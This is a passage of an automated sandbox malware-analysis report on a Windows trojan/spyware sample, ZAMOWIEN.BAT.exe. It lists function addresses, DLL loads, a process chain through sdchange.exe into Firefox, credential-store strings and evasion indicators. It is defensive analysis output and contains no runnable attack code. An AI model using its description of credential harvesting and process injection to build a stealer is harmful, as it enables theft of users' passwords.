            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0507F0E06_2_0507F0E0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050770E96_2_050770E9
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FDD2F06_2_04FDD2F0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0507132D6_2_0507132D
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FDB2C06_2_04FDB2C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FC52A06_2_04FC52A0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0500739A6_2_0500739A
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FAD34C6_2_04FAD34C
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050612ED6_2_050612ED
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_05071D5A6_2_05071D5A
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_05077D736_2_05077D73
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_05039C326_2_05039C32
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FDFDC06_2_04FDFDC0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FC3D406_2_04FC3D40
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0507FCF26_2_0507FCF2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0507FF096_2_0507FF09
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FC9EB06_2_04FC9EB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0507FFB16_2_0507FFB1
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04F83FD26_2_04F83FD2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04F83FD56_2_04F83FD5
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FC1F926_2_04FC1F92
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050559106_2_05055910
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FC38E06_2_04FC38E0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0502D8006_2_0502D800
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FC99506_2_04FC9950
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FDB9506_2_04FDB950
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0507FB766_2_0507FB76
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_05035BF06_2_05035BF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FFDBF96_2_04FFDBF9
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_05077A466_2_05077A46
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0507FA496_2_0507FA49
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_05033A6C6_2_05033A6C
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FDFB806_2_04FDFB80
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_05005AA06_2_05005AA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_05061AA36_2_05061AA3
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0505DAAC6_2_0505DAAC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0506DAC66_2_0506DAC6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030C20806_2_030C2080
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030BCF3A6_2_030BCF3A
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030BCF406_2_030BCF40
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030B13A16_2_030B13A1
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030BB29F6_2_030BB29F
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030BB2A06_2_030BB2A0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030BB1506_2_030BB150
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030BD1606_2_030BD160
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030C57406_2_030C5740
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030C39406_2_030C3940
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030C39426_2_030C3942
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030C38F96_2_030C38F9
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030DBEB06_2_030DBEB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_052DE4446_2_052DE444
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_052DE7E06_2_052DE7E0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_052DE3256_2_052DE325
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_052DD8A86_2_052DD8A8
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_052DCB336_2_052DCB33
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: String function: 32847E54 appears 108 times
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: String function: 3286EA12 appears 82 times
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: String function: 327EB970 appears 262 times
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: String function: 32835130 appears 58 times
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: String function: 3287F290 appears 103 times
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 0503F290 appears 103 times
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 0502EA12 appears 86 times
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 04FAB970 appears 262 times
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 05007E54 appears 107 times
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 04FF5130 appears 58 times
            Source: ZAMOWIEN.BAT.exe, 00000004.00000003.2329811647.0000000032590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ZAMOWIEN.BAT.exe
            Source: ZAMOWIEN.BAT.exe, 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ZAMOWIEN.BAT.exe
            Source: ZAMOWIEN.BAT.exe, 00000004.00000003.2331545937.0000000032742000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ZAMOWIEN.BAT.exe
            Source: ZAMOWIEN.BAT.exe, 00000004.00000003.2393602242.00000000028AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesdchange.exej% vs ZAMOWIEN.BAT.exe
            Source: ZAMOWIEN.BAT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/12@4/3
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_0040364B EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040364B
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile created: C:\Users\user\overlbene.lnkJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile created: C:\Users\user\AppData\Local\Temp\nswC98.tmpJump to behavior
            Source: ZAMOWIEN.BAT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: sdchange.exe, 00000006.00000003.2616531743.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000003.2616421151.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000002.2884931299.00000000033E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: ZAMOWIEN.BAT.exeReversingLabs: Detection: 13%
            Source: ZAMOWIEN.BAT.exeVirustotal: Detection: 18%
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile read: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess created: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
            Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess created: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"Jump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: ZAMOWIEN.BAT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: sdchange.pdbGCTL source: ZAMOWIEN.BAT.exe, 00000004.00000003.2393602242.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000005.00000002.2885039540.00000000004E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdb source: ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.0000000000649000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iIQnSvahHYwDQ.exe, 00000005.00000002.2885324089.0000000000E0E000.00000002.00000001.01000000.0000000A.sdmp, iIQnSvahHYwDQ.exe, 00000008.00000002.2885556820.0000000000E0E000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: ZAMOWIEN.BAT.exe, 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000003.2331545937.0000000032615000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000003.2329811647.000000003246D000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000003.2442207116.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000006.00000003.2440236636.0000000004C27000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ZAMOWIEN.BAT.exe, ZAMOWIEN.BAT.exe, 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000003.2331545937.0000000032615000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000003.2329811647.000000003246D000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 00000006.00000003.2442207116.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000006.00000003.2440236636.0000000004C27000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.0000000000649000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: sdchange.pdb source: ZAMOWIEN.BAT.exe, 00000004.00000003.2393602242.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000005.00000002.2885039540.00000000004E8000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2063039037.0000000004F1D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_6E351BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6E351BFF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_6E3530C0 push eax; ret 0_2_6E3530EE
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327C225F pushad ; ret 4_2_327C27F9
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327C27FA pushad ; ret 4_2_327C27F9
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327C283D push eax; iretd 4_2_327C2858
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F09AD push ecx; mov dword ptr [esp], ecx4_2_327F09B6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04F827FA pushad ; ret 6_2_04F827F9
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04F8225F pushad ; ret 6_2_04F827F9
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04F8283D push eax; iretd 6_2_04F82858
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FB09AD push ecx; mov dword ptr [esp], ecx6_2_04FB09B6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04F81368 push eax; iretd 6_2_04F81369
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030C60E1 pushfd ; retf 6_2_030C60E2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030CC715 pushad ; retf 6_2_030CC718
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030D45A0 push ss; iretd 6_2_030D46D4
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030D0B05 pushfd ; iretd 6_2_030D0B07
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030D091D pushad ; iretd 6_2_030D091E
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030BE8DC push ds; retf 6_2_030BE8E3
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030C0CA1 push CD2A7FC7h; retf 6_2_030C0CA6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030B149A pushfd ; ret 6_2_030B149D
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030C1B12 push es; ret 6_2_030C1B78
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030C1B79 push es; ret 6_2_030C1B78
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030C7A01 pushad ; ret 6_2_030C7A05
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030B1AD6 push ss; retf 6_2_030B1B12
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030CB9DF push ebx; ret 6_2_030CB9EB
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030B78D4 push eax; retf 6_2_030B78D5
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030CDDAD push B857AF21h; retf 6_2_030CDDD7
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030C7C19 push esi; ret 6_2_030C7C27
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030C7C20 push esi; ret 6_2_030C7C27
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_052D7403 push cs; ret 6_2_052D740C
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_052D67A6 pushad ; retf 6_2_052D67A7
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_052D53AA pushad ; iretd 6_2_052D53AB
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_052D5FF1 push esi; iretd 6_2_052D5FF3
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile created: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile created: C:\Users\user\AppData\Local\Temp\nssF88.tmp\LangDLL.dllJump to dropped file
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeAPI/Special instruction interceptor: Address: 55063DD
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeAPI/Special instruction interceptor: Address: 1D863DD
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
